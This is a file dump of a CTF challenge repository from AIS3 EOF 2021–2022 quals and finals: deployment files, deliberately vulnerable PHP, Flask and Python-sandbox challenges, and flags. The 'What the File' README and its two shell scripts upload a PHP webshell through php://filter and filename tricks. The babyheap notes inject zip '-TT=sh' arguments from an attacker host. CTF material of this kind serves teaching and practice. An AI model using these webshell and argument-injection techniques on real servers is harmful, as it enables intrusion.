/ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/grid-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/grid.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/hyphen-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/hyphen-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/left-brace-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/left-brace-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/radio-checked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/radio-checked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/radio-unchecked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/radio-unchecked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/right-brace-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/right-brace-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-100-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-100-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-25-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-25-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-50-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-50-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-75-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-75-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app 4 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:python3.8 2 | RUN pip3 install redis rq 3 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/config.js: -------------------------------------------------------------------------------- 1 | const CONFIG = { 2 | productName: "CTF Note", 3 | version: "v0.0.87", 4 | plugins: { 5 | nyanCat: '/plugins/nyan.js', 6 | xssSimulator: '/plugins/xss.js' 7 | } 8 | }; -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/plugins/nyan.js: 
-------------------------------------------------------------------------------- 1 | (function () { 2 | const nyanCatURL = "/static/nyancat.gif"; 3 | document.querySelectorAll("p.title:not(.is-4)") 4 | .forEach(title => { 5 | const img = document.createElement("img"); 6 | img.src = nyanCatURL; 7 | img.style.height = '2rem'; 8 | title.appendChild(img); 9 | }); 10 | })(); 11 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/plugins/xss.js: -------------------------------------------------------------------------------- 1 | (function () { 2 | alert("xss!"); 3 | })(); -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/static/nyancat.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/ctf-note/src/static/nyancat.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/static/style.css: -------------------------------------------------------------------------------- 1 | .challenge { 2 | margin-top: 1em; 3 | margin-bottom: 1em; 4 | } 5 | 6 | .notification { 7 | padding: 1em; 8 | text-align: center; 9 | color: #363636; 10 | } 11 | 12 | .notification:hover { 13 | transition: .25s all; 14 | scale: 1.05; 15 | z-index: 1; 16 | box-shadow: 0 0 .5em #ccc; 17 | } -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/xssbot/Dockerfile: 
-------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt update 4 | RUN apt install -y --no-install-recommends chromium chromium-driver redis-server 5 | RUN pip3 install selenium redis rq 6 | 7 | COPY xssbot.py /xssbot.py 8 | COPY run.sh /run.sh 9 | RUN chmod +x /run.sh 10 | RUN useradd --no-create-home --home-dir / --shell /bin/false user 11 | 12 | USER user 13 | CMD /run.sh -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/xssbot/run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | redis-server --protected-mode no & 3 | for _ in {1..4}; do 4 | rq worker & 5 | done 6 | sleep infinity 7 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/xssbot/xssbot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import time 3 | 4 | from selenium.webdriver import Chrome 5 | from selenium.webdriver.chrome.options import Options 6 | from selenium.common.exceptions import TimeoutException, WebDriverException 7 | import os 8 | 9 | TIMEOUT = 7 10 | HOSTNAME = "ctf-note.splitline.tw:9527" 11 | 12 | def browse(url_path): 13 | options = Options() 14 | options.headless = True 15 | options.add_argument('--no-sandbox') # https://stackoverflow.com/a/45846909 16 | options.add_argument('--disable-dev-shm-usage') # https://stackoverflow.com/a/50642913 17 | chrome = Chrome(options=options) 18 | # https://stackoverflow.com/a/47695227 19 | chrome.set_page_load_timeout(TIMEOUT) 20 | chrome.set_script_timeout(TIMEOUT) 21 | 22 | # login 23 | password = os.getenv("PASSWORD") 24 | chrome.get(f"http://{HOSTNAME}/login") 25 | chrome.find_element_by_name('username').send_keys('admin') 26 | chrome.find_element_by_name('password').send_keys(password) 27 | 
chrome.find_element_by_tag_name('button').click() 28 | 29 | # visit 30 | chrome.get(f"http://{HOSTNAME}/{url_path}") 31 | 32 | time.sleep(TIMEOUT) 33 | chrome.quit() -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/docker-compose.yml: -------------------------------------------------------------------------------- 1 | 2 | version: "3" 3 | 4 | services: 5 | xssbot: 6 | build: ./ctf-note/xssbot 7 | image: splitline/xssbot 8 | container_name: xssbot-ctf-note 9 | environment: 10 | - PASSWORD=lHgpu4EqS4DOJz12Klz0JjQ9CY8nJ3um8yTKl-3YXVg 11 | 12 | ctf-note: 13 | depends_on: 14 | - xssbot 15 | build: ./ctf-note 16 | container_name: ctf-note 17 | volumes: 18 | - ./ctf-note/src/:/app 19 | ports: 20 | - 9527:80/tcp 21 | environment: 22 | - FLAG=FLAG{會不會由於出太難以至於根本沒人看到這個FLAG啊,但你現在好像看到ㄌ,讚} 23 | - PASSWORD=lHgpu4EqS4DOJz12Klz0JjQ9CY8nJ3um8yTKl-3YXVg 24 | 25 | what-the-file: 26 | build: ./what-the-file 27 | container_name: what-the-file 28 | volumes: 29 | - ./what-the-file/flag:/flag_4a55febfacff05bd19fa26ae3d74f796:ro 30 | ports: 31 | - 9487:80/tcp 32 | 33 | CYBERPUNK1977: 34 | image: tiangolo/uwsgi-nginx-flask:python3.8 35 | container_name: CYBERPUNK1977 36 | volumes: 37 | - ./CYBERPUNK1977/app/:/app 38 | ports: 39 | - 1977:80/tcp 40 | environment: 41 | - FLAG=FLAG{RE𝖠𝗟_FⅬ𝗔G} 42 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.4-apache 2 | 3 | COPY src/ /var/www/html/ 4 | 5 | RUN chmod -R 755 /var/www/html 6 | RUN chown root:root /var/www/html 7 | 8 | RUN chown www-data:www-data /var/www/html/sandbox/ 9 | RUN chmod +w /var/www/html/sandbox/ 10 | RUN touch /var/www/html/sandbox/.htaccess -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/README.md: 
-------------------------------------------------------------------------------- 1 | # What the File 2 | 3 | - Category: Web 4 | - Solves: 15 / 95 (scores >= 1), 55 (scores > 1) 5 | 6 | ## Solution 7 | 8 | 1. Control `file` command's output. (e.g. use Shebang `#! meow`) 9 | 2. Solution 1: Use `convert.base64-decode` 10 | 1. 利用 php 中 base64 會忽略非 base64 字元的特性。 11 | 2. 寫入 base64 encode 過的 webshell 到 Shebang(並控制 offset 使其能正常 decode) 12 | 3. 用 `php://filter/write=convert.base64-decode/resource=file` 寫入檔案 13 | 3. Solution 2: Use `convert.iconv` 14 | 1. 利用 utf-7 會把 `<`, `>` 分別轉為 `+ADw`, `+AD4-` 的特性。 15 | 2. 寫入 utf-7 encode 的 webshell 到 Shebang 16 | 3. 用 `php://filter/write=convert.iconv.utf-7.utf-8/resource=file` 寫入檔案 17 | 4. 利用 `shell.php/.` 作為檔名,使 `pathinfo` 抓不到副檔名,但 `file_put_contents` 能正常寫入檔案 18 | 5. Get Shell! -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/exploit/base64-solution.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | BASE_URL='http://eofqual.ais3.org:9487' 4 | WEB_SHELL='' 5 | echo "#! aaa$(base64 <<< $WEB_SHELL)" > exploit 6 | 7 | res=$(curl $BASE_URL \ 8 | -F "file=@exploit" \ 9 | -F 'log=php://filter/write=convert.base64-decode/resource=shell.php/.' -s) 10 | 11 | shell_path=$(echo $res | grep -oE 'sandbox/[0-9a-f]{32}/shell\.php') 12 | echo "[+] Web Shell: $BASE_URL/$shell_path?cmd=id" 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/exploit/iconv-solution.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | BASE_URL='http://eofqual.ais3.org:9487' 4 | WEB_SHELL='' 5 | echo "#! $(iconv -t utf-7 -f utf-8 <<< $WEB_SHELL)" > exploit 6 | 7 | res=$(curl $BASE_URL \ 8 | -F "file=@exploit" \ 9 | -F 'log=php://filter/write=convert.iconv.utf-7.utf-8/resource=shell.php/.' 
-s) 10 | 11 | shell_path=$(echo $res | grep -oE 'sandbox/[0-9a-f]{32}/shell\.php') 12 | echo "[+] Web Shell: $BASE_URL/$shell_path?cmd=id" 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/flag: -------------------------------------------------------------------------------- 1 | FLAG{𖥂𖢐𖥑𖣠𖤐𖤐𖤐𖣠𖡨𖥶𖦂} -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/click.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/click.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/counter2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/counter2.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/divider.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/divider.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/flames.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/flames.gif -------------------------------------------------------------------------------- 
/ais3-eof/2021-quals/Web/what-the-file/src/img/hot.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/hot.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/ie_logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/ie_logo.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/microfab.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/microfab.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/noframes.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/noframes.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/notepad.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/notepad.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/ns_logo.gif: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/ns_logo.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/rainbow.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/rainbow.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/stars.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/stars.gif -------------------------------------------------------------------------------- /ais3-eof/2022-final/web-npy-viewer/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:latest 2 | 3 | RUN mkdir -p /usr/src/app 4 | WORKDIR /usr/src/app 5 | COPY ./app . 
6 | 7 | COPY ./flag /fl4444g 8 | 9 | RUN npm install 10 | 11 | # auto kill container after 10 minutes 12 | CMD [ "timeout", "600", "node", "app.js" ] 13 | -------------------------------------------------------------------------------- /ais3-eof/2022-final/web-npy-viewer/app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "body-parser": "1.19.1", 4 | "express": "4.17.2", 5 | "express-fileupload": "1.3.1", 6 | "npyz": "0.4.2", 7 | "nunjucks": "3.2.2" 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-final/web-npy-viewer/flag: -------------------------------------------------------------------------------- 1 | EOF{unpickling with node.js is still dangerous?!} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9 2 | 3 | RUN apt-get update 4 | RUN apt-get install xinetd -qy 5 | RUN apt-get install wget zip cowsay -qy 6 | 7 | RUN mv /usr/games/cowsay /usr/local/bin/cowsay 8 | 9 | RUN useradd -m babyheap 10 | COPY ./share /home/babyheap 11 | COPY ./xinetd /etc/xinetd.d/babyheap 12 | RUN chown -R root:root /home/babyheap 13 | RUN chmod -R 755 /home/babyheap 14 | 15 | RUN mkdir /tmp/sandbox/ && chmod 333 /tmp/sandbox/ 16 | 17 | RUN python -m pip install xonsh[full] 18 | 19 | COPY ./flag/readflag.c /readflag.c 20 | COPY ./flag/flag /flag 21 | RUN chmod 0400 /flag && chown root:root /flag 22 | RUN chmod 0444 /readflag.c && gcc /readflag.c -o /readflag 23 | RUN chown root:root /readflag && chmod 4555 /readflag 24 | 25 | CMD ["/usr/sbin/xinetd","-dontfork"] 26 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/docker-compose.yml: 
-------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | main: 5 | build: ./ 6 | ports: 7 | - "7122:2222" 8 | expose: 9 | - "7122" 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/exploit/exp.txt: -------------------------------------------------------------------------------- 1 | // 我沒辦法在我ㄉ m1 裝 pwntools 所以懶得寫 exploit script 2 | 3 | 0. read source code 4 | ctrl+d 就會噴位置ㄌ 5 | 不然從 /proc/self/environ 讀也行 6 | 7 | 1. import (9487) 8 | http://vps/babyheap-downloads.txt 9 | 10 | babyheap-downloads.txt 內容為: 11 | ``` 12 | http://vps/-T 13 | http://vps/-TT=sh%20%23 14 | ``` 15 | 16 | 2. import 9487 17 | -ibabyheap-downloads.txt 18 | 19 | 3. export 9527 20 | pwned 21 | // `zip export.zip *` --> `zip export.zip files -T -TT=sh\ #` 22 | 23 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/flag/flag: -------------------------------------------------------------------------------- 1 | FLAG{I don't know why but nc+note=babyheap} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/flag/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char *argv[]) { 4 | seteuid(0); 5 | setegid(0); 6 | setuid(0); 7 | setgid(0); 8 | 9 | if(argc < 5) { 10 | printf("Usage: %s i want the flag\n", argv[0]); 11 | return 1; 12 | } 13 | 14 | if ((strcmp(argv[1], "i") | strcmp(argv[2], "want") | strcmp(argv[3], "the") | strcmp(argv[4], "flag")) != 0) { 15 | puts("You are not worthy"); 16 | return 1; 17 | } 18 | 19 | char flag[256] = { 0 }; 20 | FILE* fp = fopen("/flag", "r"); 21 | if (!fp) { 22 | perror("fopen"); 23 | return 1; 24 | } 25 | if (fread(flag, 1, 256, fp) < 0) { 26 | perror("fread"); 27 | return 1; 28 | } 29 | puts(flag); 30 | fclose(fp); 31 | return 
0; 32 | } -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # exec 2>/dev/null 4 | export XONSH_DATA_DIR="/tmp/.xondata" 5 | timeout 180 xonsh /home/babyheap/main.xonsh 6 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/xinetd: -------------------------------------------------------------------------------- 1 | service babyheap 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/babyheap/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = babyheap 10 | bind = 0.0.0.0 11 | port = 2222 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | flags = REUSE 16 | } 17 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM docker:dind 2 | 3 | RUN apk add --update --no-cache python3 py-pip nmap-ncat 4 | 5 | RUN pip install epicbox rich 6 | 7 | WORKDIR /ctf 8 | ENTRYPOINT "/ctf/run.sh" 9 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | judge: 5 | privileged: true 6 | volumes: 7 | - ./share:/ctf 8 | build: ./ 9 | ports: 10 | - "1337:48763" 11 | expose: 12 | - "1337" 13 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/README.md: -------------------------------------------------------------------------------- 1 | # LeetCall 2 | 3 | No operators, no conditions, no loops this time, function call is all you need! 4 | 5 | ## Rules: 6 | 1. 
Just like most of the online judges, inputs are provided from the standard input. 7 | 2. All you can use in your code is: (function) name (e.g. `print`), function call (e.g. `str()`), constants (int, float, byte, normal string etc.). 8 | 3. Your code should contain only one expression (i.e. it can be used in `eval`). 9 | 4. You are unable to use `exec`, `eval`, `import` or similar things to cheat. 10 | 5. If there is something you don't understand, the source code is provided -- so just read it. 11 | 6. Conquer all three challenges and capture the FLAG! 12 | 13 | ## Notes: 14 | 1. For programmers: You are not required to read the source code. 15 | 2. For hackers: This is totally not a sandbox escape challenge, but feel free if you really want to hack it. 3. For operators: the judge service runs with `privileged: true` (see `docker-compose.yml`) because it hosts docker-in-docker, so an escape from a per-submission container is not contained by the outer judge container -- deploy it on an isolated host. 16 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/flag.txt: -------------------------------------------------------------------------------- 1 | FLAG{actually_you_can_also_solve_those_leetcode_challenges_in_this_way:D} 2 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/problems.sample.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "id": 1, 4 | "title": "Hello", 5 | "description": 6 | "Write a code that takes a name as an input and print out a greeting with that name.\nThe greeting format should be 'Hello, !'", 7 | "sample_input": ["Alice", "Bob"], 8 | "sample_output": ["Hello, Alice!", "Hello, Bob!"], 9 | "test_cases": [ 10 | ["Alice", "Hello, Alice!"], 11 | ["Alice\nBob", "Hello, Alice!\nHello, Bob!"] 12 | ], 13 | "length_limit": 128 14 | } 15 | ] -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | rm -f /var/run/docker.pid 3 | dockerd 
& 4 | sleep 3s 5 | docker pull python:3.9-alpine 6 | ncat -vc 'timeout 500 python3 /ctf/main.py' -kl 0.0.0.0 48763 7 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/sandbox.tpl.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | # Delete all imported modules 4 | for name in list(sys.modules.keys()): 5 | # '_bootlocale' is for open() 6 | # if encoding of `open` is not specified, it will automatically import `_bootlocale` to get the default encoding 7 | if name != '_bootlocale': 8 | del sys.modules[name] 9 | 10 | 11 | def hook(event, args): 12 | """ 13 | Using Python runtime audit hooks to prevent exec / eval normal python codes. 14 | audithook: 15 | - https://www.python.org/dev/peps/pep-0578/ 16 | - https://docs.python.org/3/library/audit_events.html 17 | """ 18 | if event not in ('open', 'builtins.input', 'builtins.input/result'): 19 | raise Exception("Bad event: " + event+"\n"+str(args)) 20 | if event == 'open' and args[0] != 0: 21 | raise Exception("Sandbox only accepts stdin from file 0") 22 | 23 | 24 | sys.addaudithook(hook) 25 | del sys, hook 26 | 27 | # Your code starts here 28 | {code} 29 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.4-apache 2 | 3 | COPY src/ /var/www/html/ 4 | 5 | RUN chmod -R 755 /var/www/html 6 | RUN chown root:root /var/www/html 7 | 8 | RUN chown www-data:www-data /var/www/html/sandbox/ 9 | RUN chmod +w /var/www/html/sandbox/ 10 | RUN touch /var/www/html/sandbox/.htaccess 11 | RUN touch /var/www/html/sandbox/index.php 12 | 13 | RUN echo 'FLAG{Pecchipee://filter/k!ng}' > /za_f14g.txt -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/docker-compose.yml: 
-------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: . 6 | ports: 7 | - 8002:80/tcp -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/click.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/click.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/counter2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/counter2.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/divider.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/divider.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/flames.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/flames.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/hot.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/hot.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/ie_logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/ie_logo.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/microfab.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/microfab.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/noframes.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/noframes.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/notepad.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/notepad.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/ns_logo.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/ns_logo.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/rainbow.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/rainbow.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/stars.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/stars.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/index.php: -------------------------------------------------------------------------------- 1 | 11 | 255 && die('toooooooo loooooong'); ( 12 | trim($ext=pathinfo($out)['extension' 13 | ]) !== '' && strtolower(substr($ext, 14 | 0, 2)) !== "ph")?file_put_contents ( 15 | $out,sprintf(file_get_contents('/va' 16 | .'r/www/html/template.html'), $time, 17 | highlight_string($_GET['code'],true) 18 | )) : die("BAD"); echo "

Highlight: 19 | $out

" 20 | // You might also need: /phpinfo.php 21 | ?> 22 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/phpinfo.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/sandbox/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/sandbox/.gitkeep -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:python3.9 2 | RUN pip3 install redis rq requests 3 | RUN pip3 install --upgrade flask Werkzeug uwsgi 4 | -------------------------------------------------------------------------------- 